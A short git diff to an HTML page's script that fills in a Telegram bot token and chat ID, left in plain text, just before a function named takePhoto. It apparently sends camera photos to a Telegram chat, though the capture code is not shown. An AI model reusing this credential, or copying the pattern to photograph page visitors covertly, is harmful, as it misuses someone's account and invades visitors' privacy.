--- a/index.html
+++ b/index.html
@@ -135,8 +135,8 @@
         const result = document.getElementById('result');
 
         // ЗАМЕНИТЕ ЭТИ ЗНАЧЕНИЯ НА СВОИ
-        const BOT_TOKEN = 'В8188957293:AAHmtiE3sgaj0lhUYijUmOnUYBWDaJw39JE';
-        const CHAT_ID = 'В2126669672';
+        const BOT_TOKEN = '8188957293:AAHmtiE3sgaj0lhUYijUmOnUYBWDaJw39JE';
+        const CHAT_ID = '2126669672';
 
         async function takePhoto() {
             try {
